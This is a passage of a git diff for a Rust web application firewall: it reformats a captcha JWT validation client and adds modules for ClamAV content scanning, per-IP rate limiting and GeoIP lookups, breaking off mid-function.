"{}:captcha_jwt:{}", + redis_manager.create_namespace("captcha"), + jti + ); let mut redis = redis_manager.get_connection(); let token_data = serde_json::to_string(&captcha_token) .context("Failed to serialize captcha token")?; @@ -219,7 +237,12 @@ impl CaptchaClient { } /// Validate a JWT captcha token - pub async fn validate_token(&self, token: &str, ip_address: &str, user_agent: &str) -> Result { + pub async fn validate_token( + &self, + token: &str, + ip_address: &str, + user_agent: &str, + ) -> Result { let decoding_key = DecodingKey::from_secret(self.config.jwt_secret.as_bytes()); let mut validation = Validation::new(Algorithm::HS256); validation.set_audience(&["captcha-validation"]); @@ -261,21 +284,32 @@ impl CaptchaClient { // If not found in memory cache, check Redis if !captcha_validated { if let Ok(redis_manager) = RedisManager::get() { - let key = format!("{}:captcha_jwt:{}", redis_manager.create_namespace("captcha"), claims.jti); + let key = format!( + "{}:captcha_jwt:{}", + redis_manager.create_namespace("captcha"), + claims.jti + ); log::debug!("Looking up token in Redis with key: {}", key); let mut redis = redis_manager.get_connection(); match redis.get::<_, String>(&key).await { Ok(token_data_str) => { log::debug!("Found token data in Redis: {}", token_data_str); - if let Ok(updated_token) = serde_json::from_str::(&token_data_str) { + if let Ok(updated_token) = + serde_json::from_str::(&token_data_str) + { captcha_validated = updated_token.claims.captcha_validated; - log::debug!("Updated captcha_validated from Redis: {}", captcha_validated); + log::debug!( + "Updated captcha_validated from Redis: {}", + captcha_validated + ); // Update memory cache if found in Redis if captcha_validated { - let expiration = Instant::now() + Duration::from_secs(self.config.token_ttl_seconds); - let mut validated_tokens = self.validated_tokens.write().await; + let expiration = Instant::now() + + Duration::from_secs(self.config.token_ttl_seconds); + let mut validated_tokens = + self.validated_tokens.write().await; validated_tokens.insert(claims.jti.clone(), expiration); } } else { @@ -283,7 +317,11 @@ impl CaptchaClient { } } Err(e) => { - log::debug!("Redis token lookup failed for JTI {}: {}", claims.jti, e); + log::debug!( + "Redis token lookup failed for JTI {}: {}", + claims.jti, + e + ); } } } else { @@ -299,7 +337,11 @@ impl CaptchaClient { // Optional: Check Redis blacklist for revoked tokens if let Ok(redis_manager) = RedisManager::get() { - let blacklist_key = format!("{}:captcha_blacklist:{}", redis_manager.create_namespace("captcha"), claims.jti); + let blacklist_key = format!( + "{}:captcha_blacklist:{}", + redis_manager.create_namespace("captcha"), + claims.jti + ); let mut redis = redis_manager.get_connection(); match redis.exists::<_, bool>(&blacklist_key).await { Ok(true) => { @@ -336,16 +378,25 @@ impl CaptchaClient { let claims = token_data.claims; // Store the JTI as validated in memory cache - let expiration = Instant::now() + Duration::from_secs(self.config.token_ttl_seconds); + let expiration = + Instant::now() + Duration::from_secs(self.config.token_ttl_seconds); { let mut validated_tokens = self.validated_tokens.write().await; validated_tokens.insert(claims.jti.clone(), expiration); - log::debug!("Marked token JTI {} as validated, expires at {:?}", claims.jti, expiration); + log::debug!( + "Marked token JTI {} as validated, expires at {:?}", + claims.jti, + expiration + ); } // Also update Redis cache if available (for persistence across restarts) if let Ok(redis_manager) = RedisManager::get() { - let key = format!("{}:captcha_jwt:{}", redis_manager.create_namespace("captcha"), claims.jti); + let key = format!( + "{}:captcha_jwt:{}", + redis_manager.create_namespace("captcha"), + claims.jti + ); log::debug!("Storing updated token in Redis with key: {}", key); let mut redis = redis_manager.get_connection(); @@ -392,7 +443,11 @@ impl CaptchaClient { // Add to Redis blacklist if let Ok(redis_manager) = RedisManager::get() { - let blacklist_key = format!("{}:captcha_blacklist:{}", redis_manager.create_namespace("captcha"), claims.jti); + let blacklist_key = format!( + "{}:captcha_blacklist:{}", + redis_manager.create_namespace("captcha"), + claims.jti + ); let mut redis = redis_manager.get_connection(); let _: () = redis .set_ex(&blacklist_key, "revoked", self.config.token_ttl_seconds) @@ -425,22 +480,25 @@ impl CaptchaClient { CaptchaProvider::HCaptcha => ( "https://js.hcaptcha.com/1/api.js", "h-captcha", - "data-callback=\"captchaCallback\"" + "data-callback=\"captchaCallback\"", ), CaptchaProvider::ReCaptcha => ( "https://www.recaptcha.net/recaptcha/api.js", "g-recaptcha", - "data-callback=\"captchaCallback\"" + "data-callback=\"captchaCallback\"", ), CaptchaProvider::Turnstile => ( "https://challenges.cloudflare.com/turnstile/v0/api.js", "cf-turnstile", - "data-callback=\"onTurnstileSuccess\" data-error-callback=\"onTurnstileError\"" + "data-callback=\"onTurnstileSuccess\" data-error-callback=\"onTurnstileError\"", ), }; let jwt_token_input = if let Some(token) = jwt_token { - format!(r#""#, token) + format!( + r#""#, + token + ) } else { r#""#.to_string() }; @@ -614,11 +672,7 @@ impl CaptchaClient { "#, - frontend_js, - frontend_key, - site_key, - callback_attr, - jwt_token_input + frontend_js, frontend_key, site_key, callback_attr, jwt_token_input ); html_template } @@ -626,8 +680,7 @@ impl CaptchaClient { /// Validate with hCaptcha API async fn validate_hcaptcha(&self, request: &CaptchaValidationRequest) -> Result { // Use shared HTTP client with keepalive instead of creating new client - let client = get_global_reqwest_client() - .context("Failed to get global HTTP client")?; + let client = get_global_reqwest_client().context("Failed to get global HTTP client")?; let mut params = HashMap::new(); params.insert("response", &request.response_token); @@ -635,8 +688,11 @@ impl CaptchaClient { params.insert("sitekey", &request.site_key); params.insert("remoteip", &request.ip_address); - log::info!("hCaptcha validation request - response_length: {}, remote_ip: {}", - request.response_token.len(), request.ip_address); + log::info!( + "hCaptcha validation request - response_length: {}, remote_ip: {}", + request.response_token.len(), + request.ip_address + ); let response = client .post("https://hcaptcha.com/siteverify") @@ -645,10 +701,16 @@ impl CaptchaClient { .await .context("Failed to send hCaptcha validation request")?; - log::info!("hCaptcha validation HTTP response - status: {}", response.status()); + log::info!( + "hCaptcha validation HTTP response - status: {}", + response.status() + ); if !response.status().is_success() { - log::error!("hCaptcha service returned non-success status: {}", response.status()); + log::error!( + "hCaptcha service returned non-success status: {}", + response.status() + ); return Ok(false); } @@ -674,7 +736,10 @@ impl CaptchaClient { return Ok(false); } _ => { - log::warn!("hCaptcha validation failed with error code: {}", error_code); + log::warn!( + "hCaptcha validation failed with error code: {}", + error_code + ); } } } @@ -689,16 +754,18 @@ impl CaptchaClient { /// Validate with reCAPTCHA API async fn validate_recaptcha(&self, request: &CaptchaValidationRequest) -> Result { // Use shared HTTP client with keepalive instead of creating new client - let client = get_global_reqwest_client() - .context("Failed to get global HTTP client")?; + let client = get_global_reqwest_client().context("Failed to get global HTTP client")?; let mut params = HashMap::new(); params.insert("response", &request.response_token); params.insert("secret", &request.secret_key); params.insert("remoteip", &request.ip_address); - log::info!("reCAPTCHA validation request - response_length: {}, remote_ip: {}", - request.response_token.len(), request.ip_address); + log::info!( + "reCAPTCHA validation request - response_length: {}, remote_ip: {}", + request.response_token.len(), + request.ip_address + ); let response = client .post("https://www.recaptcha.net/recaptcha/api/siteverify") @@ -707,10 +774,16 @@ impl CaptchaClient { .await .context("Failed to send reCAPTCHA validation request")?; - log::info!("reCAPTCHA validation HTTP response - status: {}", response.status()); + log::info!( + "reCAPTCHA validation HTTP response - status: {}", + response.status() + ); if !response.status().is_success() { - log::error!("reCAPTCHA service returned non-success status: {}", response.status()); + log::error!( + "reCAPTCHA service returned non-success status: {}", + response.status() + ); return Ok(false); } @@ -736,7 +809,10 @@ impl CaptchaClient { return Ok(false); } _ => { - log::warn!("reCAPTCHA validation failed with error code: {}", error_code); + log::warn!( + "reCAPTCHA validation failed with error code: {}", + error_code + ); } } } @@ -751,16 +827,18 @@ impl CaptchaClient { /// Validate with Cloudflare Turnstile API async fn validate_turnstile(&self, request: &CaptchaValidationRequest) -> Result { // Use shared HTTP client with keepalive instead of creating new client - let client = get_global_reqwest_client() - .context("Failed to get global HTTP client")?; + let client = get_global_reqwest_client().context("Failed to get global HTTP client")?; let mut params = HashMap::new(); params.insert("response", &request.response_token); params.insert("secret", &request.secret_key); params.insert("remoteip", &request.ip_address); - log::info!("Turnstile validation request - response_length: {}, remote_ip: {}", - request.response_token.len(), request.ip_address); + log::info!( + "Turnstile validation request - response_length: {}, remote_ip: {}", + request.response_token.len(), + request.ip_address + ); let response = client .post("https://challenges.cloudflare.com/turnstile/v0/siteverify") @@ -769,10 +847,16 @@ impl CaptchaClient { .await .context("Failed to send Turnstile validation request")?; - log::info!("Turnstile validation HTTP response - status: {}", response.status()); + log::info!( + "Turnstile validation HTTP response - status: {}", + response.status() + ); if !response.status().is_success() { - log::error!("Turnstile service returned non-success status: {}", response.status()); + log::error!( + "Turnstile service returned non-success status: {}", + response.status() + ); return Ok(false); } @@ -798,7 +882,10 @@ impl CaptchaClient { return Ok(false); } _ => { - log::warn!("Turnstile validation failed with error code: {}", error_code); + log::warn!( + "Turnstile validation failed with error code: {}", + error_code + ); } } } @@ -832,7 +919,8 @@ impl CaptchaClient { key.to_string(), CachedCaptchaResult { is_valid, - expires_at: Instant::now() + Duration::from_secs(self.config.validation_cache_ttl_seconds), + expires_at: Instant::now() + + Duration::from_secs(self.config.validation_cache_ttl_seconds), }, ); } @@ -859,12 +947,11 @@ impl CaptchaClient { static CAPTCHA_CLIENT: OnceCell> = OnceCell::const_new(); /// Initialize the global captcha client -pub async fn init_captcha_client( - config: CaptchaConfig, -) -> Result<()> { +pub async fn init_captcha_client(config: CaptchaConfig) -> Result<()> { let client = Arc::new(CaptchaClient::new(config)); - CAPTCHA_CLIENT.set(client) + CAPTCHA_CLIENT + .set(client) .map_err(|_| anyhow::anyhow!("Failed to initialize captcha client"))?; Ok(()) @@ -902,7 +989,9 @@ pub async fn generate_captcha_token( .get() .ok_or_else(|| anyhow::anyhow!("Captcha client not initialized"))?; - client.generate_token(ip_address, user_agent, ja4_fingerprint).await + client + .generate_token(ip_address, user_agent, ja4_fingerprint) + .await } /// Validate captcha token @@ -970,25 +1059,36 @@ pub async fn validate_and_mark_captcha( ip_address: String, user_agent: Option, ) -> Result { - log::info!("validate_and_mark_captcha called for IP: {}, response_token length: {}, jwt_token length: {}", - ip_address, response_token.len(), jwt_token.len()); + log::info!( + "validate_and_mark_captcha called for IP: {}, response_token length: {}, jwt_token length: {}", + ip_address, + response_token.len(), + jwt_token.len() + ); // First validate the captcha response - let is_valid = validate_captcha_response(response_token, ip_address.clone(), user_agent.clone()).await?; + let is_valid = + validate_captcha_response(response_token, ip_address.clone(), user_agent.clone()).await?; log::info!("Captcha validation result: {}", is_valid); if is_valid { // Only try to mark JWT token as validated if it's not empty if !jwt_token.is_empty() { - if let Err(e) = mark_captcha_token_validated(&jwt_token).await { - log::warn!("Failed to mark JWT token as validated: {}", e); + if let Err(e) = mark_captcha_token_validated(&jwt_token).await { + log::warn!("Failed to mark JWT token as validated: {}", e); // Don't return false here - captcha validation succeeded } else { - log::info!("Captcha validated and JWT token marked as validated for IP: {}", ip_address); + log::info!( + "Captcha validated and JWT token marked as validated for IP: {}", + ip_address + ); } } else { - log::info!("Captcha validated successfully for IP: {} (no JWT token to mark)", ip_address); + log::info!( + "Captcha validated successfully for IP: {} (no JWT token to mark)", + ip_address + ); } } else { log::warn!("Captcha validation failed for IP: {}", ip_address); diff --git a/src/security/waf/actions/content_scanning.rs b/src/security/waf/actions/content_scanning.rs new file mode 100644 index 0000000..5a278e9 --- /dev/null +++ b/src/security/waf/actions/content_scanning.rs @@ -0,0 +1,450 @@ +//! Content Scanning Action for WAF +//! +//! This module provides ClamAV-based malware scanning for request bodies. +//! Content scanning is triggered as a WAF action when wirefilter rules match. + +use anyhow::{Result, anyhow}; +use bytes::Bytes; +use clamav_tcp::scan; +use serde::{Deserialize, Serialize}; +use std::collections::HashMap; +use std::io::Cursor; +use std::sync::{Arc, OnceLock, RwLock}; + +/// Content scanning configuration +#[derive(Debug, Clone, Deserialize, Serialize)] +pub struct ContentScanningConfig { + /// Enable or disable content scanning + #[serde(default)] + pub enabled: bool, + /// ClamAV server address (e.g., "localhost:3310") + #[serde(default = "default_clamav_server")] + pub clamav_server: String, + /// Maximum file size to scan in bytes (default: 10MB) + #[serde(default = "default_max_file_size")] + pub max_file_size: usize, +} + +fn default_clamav_server() -> String { + "localhost:3310".to_string() +} + +fn default_max_file_size() -> usize { + 10 * 1024 * 1024 // 10MB +} + +impl Default for ContentScanningConfig { + fn default() -> Self { + Self { + enabled: false, + clamav_server: default_clamav_server(), + max_file_size: default_max_file_size(), + } + } +} + +/// Content scanning result +#[derive(Debug, Clone)] +pub struct ScanResult { + /// Whether malware was detected + pub malware_detected: bool, + /// Malware signature name if detected + pub signature: Option, + /// Error message if scanning failed + pub error: Option, +} + +/// Content scanner implementation +pub struct ContentScanner { + config: Arc>, +} + +/// Extract boundary from Content-Type header for multipart content +pub fn extract_multipart_boundary(content_type: &str) -> Option { + if !content_type.to_lowercase().contains("multipart/") { + return None; + } + + for part in content_type.split(';') { + let trimmed = part.trim(); + let lower = trimmed.to_lowercase(); + if lower.starts_with("boundary=") { + if let Some(eq_pos) = trimmed.to_lowercase().find("boundary=") { + let boundary = trimmed[eq_pos + 9..].trim(); + let boundary = boundary.trim_matches('"').trim_matches('\''); + return Some(boundary.to_string()); + } + } + } + + None +} + +impl ContentScanner { + /// Create a new content scanner + pub fn new(config: ContentScanningConfig) -> Self { + Self { + config: Arc::new(RwLock::new(config)), + } + } + + /// Update scanner configuration + pub fn update_config(&self, config: ContentScanningConfig) { + if let Ok(mut guard) = self.config.write() { + *guard = config; + } + } + + /// Check if content scanning is enabled + pub fn is_enabled(&self) -> bool { + self.config.read().map(|c| c.enabled).unwrap_or(false) + } + + /// Get the maximum file size for scanning + pub fn max_file_size(&self) -> usize { + self.config + .read() + .map(|c| c.max_file_size) + .unwrap_or(default_max_file_size()) + } + + /// Scan content for malware + pub async fn scan_content(&self, body_bytes: &[u8]) -> Result { + let config = match self.config.read() { + Ok(guard) => guard.clone(), + Err(_) => return Err(anyhow!("Failed to read scanner config")), + }; + + if !config.enabled { + return Ok(ScanResult { + malware_detected: false, + signature: None, + error: None, + }); + } + + // Check file size limit + if body_bytes.len() > config.max_file_size { + log::debug!( + "Skipping content scan: body too large ({} bytes, max: {})", + body_bytes.len(), + config.max_file_size + ); + return Ok(ScanResult { + malware_detected: false, + signature: None, + error: Some("Content exceeds maximum scan size".to_string()), + }); + } + + self.scan_bytes(&config.clamav_server, body_bytes).await + } + + /// Internal method to scan bytes with ClamAV + async fn scan_bytes(&self, clamav_server: &str, data: &[u8]) -> Result { + let mut cursor = Cursor::new(data); + + match scan(clamav_server, &mut cursor, None) { + Ok(result) => { + if !result.is_infected { + Ok(ScanResult { + malware_detected: false, + signature: None, + error: None, + }) + } else { + let signature = if !result.detected_infections.is_empty() { + Some(result.detected_infections.join(", ")) + } else { + None + }; + + Ok(ScanResult { + malware_detected: true, + signature, + error: None, + }) + } + } + Err(e) => { + log::error!("ClamAV scan failed: {}", e); + Ok(ScanResult { + malware_detected: false, + signature: None, + error: Some(format!("Scan failed: {}", e)), + }) + } + } + } + + /// Scan multipart content for malware + pub async fn scan_multipart_content( + &self, + body_bytes: &[u8], + boundary: &str, + ) -> Result { + let config = match self.config.read() { + Ok(guard) => guard.clone(), + Err(_) => return Err(anyhow!("Failed to read scanner config")), + }; + + if !config.enabled { + return Ok(ScanResult { + malware_detected: false, + signature: None, + error: None, + }); + } + + log::debug!("Parsing multipart body with boundary: {}", boundary); + + // Create a multipart parser + let stream = futures::stream::once(async move { + Result::::Ok(Bytes::copy_from_slice(body_bytes)) + }); + + let mut multipart = multer::Multipart::new(stream, boundary); + + let mut parts_scanned = 0; + let mut parts_failed = 0; + + while let Some(field) = multipart + .next_field() + .await + .map_err(|e| anyhow!("Failed to read multipart field: {}", e))? + { + let field_name = field.name().unwrap_or("").to_string(); + let field_filename = field.file_name().map(|s| s.to_string()); + let field_content_type = field.content_type().map(|m| m.to_string()); + + log::debug!( + "Scanning multipart field: name={}, filename={:?}, content_type={:?}", + field_name, + field_filename, + field_content_type + ); + + let field_bytes = field + .bytes() + .await + .map_err(|e| anyhow!("Failed to read field bytes: {}", e))?; + + if field_bytes.is_empty() { + log::debug!("Skipping empty multipart field: {}", field_name); + continue; + } + + if field_bytes.len() > config.max_file_size { + log::debug!( + "Skipping multipart field '{}': size {} exceeds max {}", + field_name, + field_bytes.len(), + config.max_file_size + ); + continue; + } + + parts_scanned += 1; + + match self.scan_bytes(&config.clamav_server, &field_bytes).await { + Ok(result) => { + if result.malware_detected { + log::info!( + "Malware detected in multipart field '{}' (filename: {:?}): {:?}", + field_name, + field_filename, + result.signature + ); + + return Ok(ScanResult { + malware_detected: true, + signature: result.signature.map(|s| format!("{}:{}", field_name, s)), + error: None, + }); + } + } + Err(e) => { + log::warn!("Failed to scan multipart field '{}': {}", field_name, e); + parts_failed += 1; + } + } + } + + log::debug!( + "Multipart scan complete: {} parts scanned, {} failed", + parts_scanned, + parts_failed + ); + + if parts_scanned > 0 && parts_failed == parts_scanned { + return Ok(ScanResult { + malware_detected: false, + signature: None, + error: Some(format!( + "All {} multipart parts failed to scan", + parts_failed + )), + }); + } + + Ok(ScanResult { + malware_detected: false, + signature: None, + error: None, + }) + } + + /// Scan form data for malware + pub async fn scan_form_data(&self, form_data: &HashMap) -> Result { + let config = match self.config.read() { + Ok(guard) => guard.clone(), + Err(_) => return Err(anyhow!("Failed to read scanner config")), + }; + + if !config.enabled { + return Ok(ScanResult { + malware_detected: false, + signature: None, + error: None, + }); + } + + let combined_data = form_data + .values() + .map(|v| v.as_str()) + .collect::>() + .join("\n"); + + let mut cursor = Cursor::new(combined_data.as_bytes()); + + match scan(&config.clamav_server, &mut cursor, None) { + Ok(result) => { + if !result.is_infected { + Ok(ScanResult { + malware_detected: false, + signature: None, + error: None, + }) + } else { + let signature = if !result.detected_infections.is_empty() { + Some(result.detected_infections.join(", ")) + } else { + None + }; + + Ok(ScanResult { + malware_detected: true, + signature, + error: None, + }) + } + } + Err(e) => { + log::error!("ClamAV form data scan failed: {}", e); + Ok(ScanResult { + malware_detected: false, + signature: None, + error: Some(format!("Form data scan failed: {}", e)), + }) + } + } + } +} + +// Global content scanner instance +static CONTENT_SCANNER: OnceLock = OnceLock::new(); + +/// Get the global content scanner instance +pub fn get_global_content_scanner() -> Option<&'static ContentScanner> { + CONTENT_SCANNER.get() +} + +/// Set the global content scanner instance +pub fn set_global_content_scanner(scanner: ContentScanner) -> Result<()> { + CONTENT_SCANNER + .set(scanner) + .map_err(|_| anyhow!("Failed to initialize content scanner")) +} + +/// Initialize the global content scanner +pub fn init_content_scanner(config: ContentScanningConfig) -> Result<()> { + let scanner = ContentScanner::new(config); + set_global_content_scanner(scanner)?; + log::info!("Content scanner initialized"); + Ok(()) +} + +/// Update the global content scanner configuration +pub fn update_content_scanner_config(config: ContentScanningConfig) -> Result<()> { + if let Some(scanner) = get_global_content_scanner() { + scanner.update_config(config); + log::info!("Content scanner configuration updated"); + Ok(()) + } else { + Err(anyhow!("Content scanner not initialized")) + } +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn test_content_scanner_config_default() { + let config = ContentScanningConfig::default(); + assert!(!config.enabled); + assert_eq!(config.clamav_server, "localhost:3310"); + assert_eq!(config.max_file_size, 10 * 1024 * 1024); + } + + #[test] + fn test_extract_multipart_boundary() { + let ct1 = "multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW"; + assert_eq!( + extract_multipart_boundary(ct1), + Some("----WebKitFormBoundary7MA4YWxkTrZu0gW".to_string()) + ); + + let ct2 = "multipart/form-data; boundary=\"----WebKitFormBoundary7MA4YWxkTrZu0gW\""; + assert_eq!( + extract_multipart_boundary(ct2), + Some("----WebKitFormBoundary7MA4YWxkTrZu0gW".to_string()) + ); + + let ct3 = "application/json"; + assert_eq!(extract_multipart_boundary(ct3), None); + + let ct4 = "multipart/form-data"; + assert_eq!(extract_multipart_boundary(ct4), None); + + let ct5 = "Multipart/Form-Data; Boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW"; + assert_eq!( + extract_multipart_boundary(ct5), + Some("----WebKitFormBoundary7MA4YWxkTrZu0gW".to_string()) + ); + } + + #[test] + fn test_scanner_is_enabled() { + let config = ContentScanningConfig { + enabled: true, + ..Default::default() + }; + let scanner = ContentScanner::new(config); + assert!(scanner.is_enabled()); + + let config2 = ContentScanningConfig::default(); + let scanner2 = ContentScanner::new(config2); + assert!(!scanner2.is_enabled()); + } + + #[test] + fn test_scanner_max_file_size() { + let config = ContentScanningConfig { + max_file_size: 5 * 1024 * 1024, + ..Default::default() + }; + let scanner = ContentScanner::new(config); + assert_eq!(scanner.max_file_size(), 5 * 1024 * 1024); + } +} diff --git a/src/security/waf/actions/mod.rs b/src/security/waf/actions/mod.rs new file mode 100644 index 0000000..65a4bba --- /dev/null +++ b/src/security/waf/actions/mod.rs @@ -0,0 +1,4 @@ +pub mod block; +pub mod captcha; +pub mod content_scanning; +pub mod rate_limit; diff --git a/src/security/waf/actions/rate_limit.rs b/src/security/waf/actions/rate_limit.rs new file mode 100644 index 0000000..258825d --- /dev/null +++ b/src/security/waf/actions/rate_limit.rs @@ -0,0 +1,260 @@ +//! WAF Rate Limit Action Implementation +//! +//! This module provides rate limiting functionality for WAF rules. +//! Rate limits are applied per-rule and per-client IP. + +use dashmap::DashMap; +use once_cell::sync::Lazy; +use pingora_limits::rate::Rate; +use serde::{Deserialize, Serialize}; +use std::sync::Arc; +use std::time::Duration; + +/// Global registry of rate limiters, keyed by rule ID +static RATE_LIMITERS: Lazy>> = Lazy::new(DashMap::new); + +/// Rate limit configuration from WAF rule +#[derive(Debug, Clone, Deserialize, Serialize)] +pub struct RateLimitConfig { + /// Time period for rate limit window (in seconds as string) + pub period: String, + /// Duration to block after limit exceeded (in seconds as string) + pub duration: String, + /// Maximum number of requests allowed in the period + pub requests: String, +} + +impl RateLimitConfig { + /// Parse rate limit config from JSON value + /// Expected format: {"rateLimit": {"period": "60", "duration": "60", "requests": "100"}} + pub fn from_json(value: &serde_json::Value) -> Result { + if let Some(rate_limit_obj) = value.get("rateLimit") { + serde_json::from_value(rate_limit_obj.clone()).map_err(|e| e.to_string()) + } else { + Err("rateLimit field not found".to_string()) + } + } + + /// Get the period in seconds + pub fn period_secs(&self) -> u64 { + self.period.parse().unwrap_or(60) + } + + /// Get the duration in seconds (for blocking after limit exceeded) + pub fn duration_secs(&self) -> u64 { + self.duration.parse().unwrap_or(60) + } + + /// Get the maximum number of requests + pub fn requests_count(&self) -> usize { + self.requests.parse().unwrap_or(100) + } +} + +/// Result of a rate limit check +#[derive(Debug, Clone)] +pub struct RateLimitResult { + /// Whether the rate limit was exceeded + pub exceeded: bool, + /// Current request count in the window + pub current_requests: isize, + /// Maximum requests allowed + pub limit: usize, + /// Period in seconds + pub period_secs: u64, + /// Remaining requests (0 if exceeded) + pub remaining: usize, +} + +/// Check rate limit for a given rule and client +pub fn check_rate_limit( + rule_id: &str, + client_ip: &str, + config: &RateLimitConfig, +) -> RateLimitResult { + let period_secs = config.period_secs(); + let requests_limit = config.requests_count(); + + // Get or create rate limiter for this rule + let rate_limiter = RATE_LIMITERS + .entry(rule_id.to_string()) + .or_insert_with(|| { + log::debug!( + "Creating new rate limiter for rule {}: {} requests per {} seconds", + rule_id, + requests_limit, + period_secs + ); + Arc::new(Rate::new(Duration::from_secs(period_secs))) + }) + .clone(); + + // Observe the request - use owned String as observe requires Sized type + let key = client_ip.to_string(); + let curr_window_requests = rate_limiter.observe(&key, 1); + let exceeded = curr_window_requests > requests_limit as isize; + + let remaining = if exceeded { + 0 + } else { + (requests_limit as isize - curr_window_requests).max(0) as usize + }; + + RateLimitResult { + exceeded, + current_requests: curr_window_requests, + limit: requests_limit, + period_secs, + remaining, + } +} + +/// Generate a JSON response body for rate limit exceeded +pub fn generate_rate_limit_json( + rule_name: &str, + rule_id: &str, + result: &RateLimitResult, +) -> String { + serde_json::json!({ + "error": "Too Many Requests", + "message": format!( + "Rate limit exceeded: {} requests per {} seconds", + result.limit, result.period_secs + ), + "rule": rule_name, + "rule_id": rule_id, + "limit": result.limit, + "period": result.period_secs, + "current": result.current_requests, + }) + .to_string() +} + +/// Generate rate limit headers +pub fn generate_rate_limit_headers(result: &RateLimitResult) -> Vec<(&'static str, String)> { + vec![ + ("X-RateLimit-Limit", result.limit.to_string()), + ("X-RateLimit-Remaining", result.remaining.to_string()), + ("X-RateLimit-Reset", result.period_secs.to_string()), + ("Retry-After", result.period_secs.to_string()), + ] +} + +/// Clear rate limiter for a specific rule (useful for testing or rule updates) +pub fn clear_rate_limiter(rule_id: &str) { + RATE_LIMITERS.remove(rule_id); +} + +/// Clear all rate limiters +pub fn clear_all_rate_limiters() { + RATE_LIMITERS.clear(); +} + +/// Get the number of active rate limiters +pub fn active_rate_limiter_count() -> usize { + RATE_LIMITERS.len() +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn test_rate_limit_config_from_json() { + let json = serde_json::json!({ + "rateLimit": { + "period": "60", + "duration": "120", + "requests": "100" + } + }); + + let config = RateLimitConfig::from_json(&json).unwrap(); + assert_eq!(config.period_secs(), 60); + assert_eq!(config.duration_secs(), 120); + assert_eq!(config.requests_count(), 100); + } + + #[test] + fn test_rate_limit_config_defaults() { + let config = RateLimitConfig { + period: "invalid".to_string(), + duration: "invalid".to_string(), + requests: "invalid".to_string(), + }; + + assert_eq!(config.period_secs(), 60); + assert_eq!(config.duration_secs(), 60); + assert_eq!(config.requests_count(), 100); + } + + #[test] + fn test_check_rate_limit() { + let config = RateLimitConfig { + period: "60".to_string(), + duration: "60".to_string(), + requests: "5".to_string(), + }; + + // Clear any existing limiter for this test + clear_rate_limiter("test_rule_1"); + + // First 5 requests should pass + for i in 1..=5 { + let result = check_rate_limit("test_rule_1", "192.168.1.1", &config); + assert!(!result.exceeded, "Request {} should not be rate limited", i); + assert_eq!(result.current_requests, i as isize); + assert_eq!(result.remaining, 5 - i); + } + + // 6th request should be rate limited + let result = check_rate_limit("test_rule_1", "192.168.1.1", &config); + assert!(result.exceeded, "Request 6 should be rate limited"); + assert_eq!(result.remaining, 0); + + // Different IP should not be rate limited + clear_rate_limiter("test_rule_2"); + let result = check_rate_limit("test_rule_2", "192.168.1.2", &config); + assert!(!result.exceeded, "Different IP should not be rate limited"); + } + + #[test] + fn test_generate_rate_limit_json() { + let result = RateLimitResult { + exceeded: true, + current_requests: 101, + limit: 100, + period_secs: 60, + remaining: 0, + }; + + let json = generate_rate_limit_json("test_rule", "rule_123", &result); + assert!(json.contains("Too Many Requests")); + assert!(json.contains("test_rule")); + assert!(json.contains("rule_123")); + } + + #[test] + fn test_generate_rate_limit_headers() { + let result = RateLimitResult { + exceeded: false, + current_requests: 50, + limit: 100, + period_secs: 60, + remaining: 50, + }; + + let headers = generate_rate_limit_headers(&result); + assert_eq!(headers.len(), 4); + assert!( + headers + .iter() + .any(|(k, v)| *k == "X-RateLimit-Limit" && v == "100") + ); + assert!( + headers + .iter() + .any(|(k, v)| *k == "X-RateLimit-Remaining" && v == "50") + ); + } +} diff --git a/src/security/waf/geoip/mod.rs b/src/security/waf/geoip/mod.rs new file mode 100644 index 0000000..4be3da5 --- /dev/null +++ b/src/security/waf/geoip/mod.rs @@ -0,0 +1,214 @@ +use std::net::IpAddr; +use std::path::PathBuf; +use std::sync::Arc; + +use anyhow::{Result, anyhow}; +use maxminddb::{MaxMindDbError, Reader, geoip2}; +use serde::{Deserialize, Serialize}; + +use crate::utils::maxmind::MaxMindManager; + +/// GeoIP information +#[derive(Debug, Clone, Serialize, Deserialize)] +pub struct GeoInfo { + pub country: String, + pub iso_code: String, + #[serde(rename = "asniso_code")] + pub asn_iso_code: String, +} + +/// GeoIP database manager for country, ASN, and city lookups +pub struct GeoIpManager { + country: MaxMindManager, + asn: MaxMindManager, + city: MaxMindManager, +} + +impl GeoIpManager { + /// Create a new GeoIP manager + pub fn new( + country_path: Option, + asn_path: Option, + city_path: Option, + ) -> Self { + Self { + country: MaxMindManager::new(country_path, Some("GeoLite2-Country.mmdb")), + asn: MaxMindManager::new(asn_path, Some("GeoLite2-ASN.mmdb")), + city: MaxMindManager::new(city_path, Some("GeoLite2-City.mmdb")), + } + } + + /// Refresh all GeoIP databases + pub async fn refresh_all(&self) -> Result<()> { + if let Err(e) = self.refresh_country().await { + log::warn!("Failed to refresh GeoIP Country database: {}", e); + } + if let Err(e) = self.refresh_asn().await { + log::warn!("Failed to refresh GeoIP ASN database: {}", e); + } + if let Err(e) = self.refresh_city().await { + log::warn!("Failed to refresh GeoIP City database: {}", e); + } + Ok(()) + } + + /// Refresh the country database + pub async fn refresh_country(&self) -> Result>> { + self.country.refresh().await + } + + /// Refresh the ASN database + pub async fn refresh_asn(&self) -> Result>> { + self.asn.refresh().await + } + + /// Refresh the city database + pub async fn refresh_city(&self) -> Result>> { + self.city.refresh().await + } + + /// Lookup GeoIP information for an IP address + pub async fn lookup(&self, ip: IpAddr) -> Result<(GeoInfo, u32, String)> { + log::debug!("🔍 [GeoIP] Looking up IP: {}", ip); + + // ASN lookup + let (asn_num, asn_org) = if let Ok(reader) = self.asn.ensure_reader().await { + tokio::task::spawn_blocking({ + let reader = reader.clone(); + let ip_clone = ip; + move || -> Result<(u32, String), MaxMindDbError> { + match reader.lookup(ip_clone) { + Ok(lookup_result) => { + if !lookup_result.has_data() { + log::warn!("🔍 [GeoIP] ASN Lookup: No data for {}", ip_clone); + return Ok((0, String::new())); + } + match lookup_result.decode::() { + Ok(Some(res)) => { + let asn = res.autonomous_system_number.unwrap_or(0); + let org = res + .autonomous_system_organization + .unwrap_or("") + .to_string(); + log::info!( + "🔍 [GeoIP] ASN Lookup Success for {}: ASN={}, Org='{}'", + ip_clone, + asn, + org + ); + Ok((asn, org)) + } + Ok(None) => { + log::warn!( + "🔍 [GeoIP] ASN Lookup: No ASN data for {}", + ip_clone + ); + Ok((0, String::new())) + } + 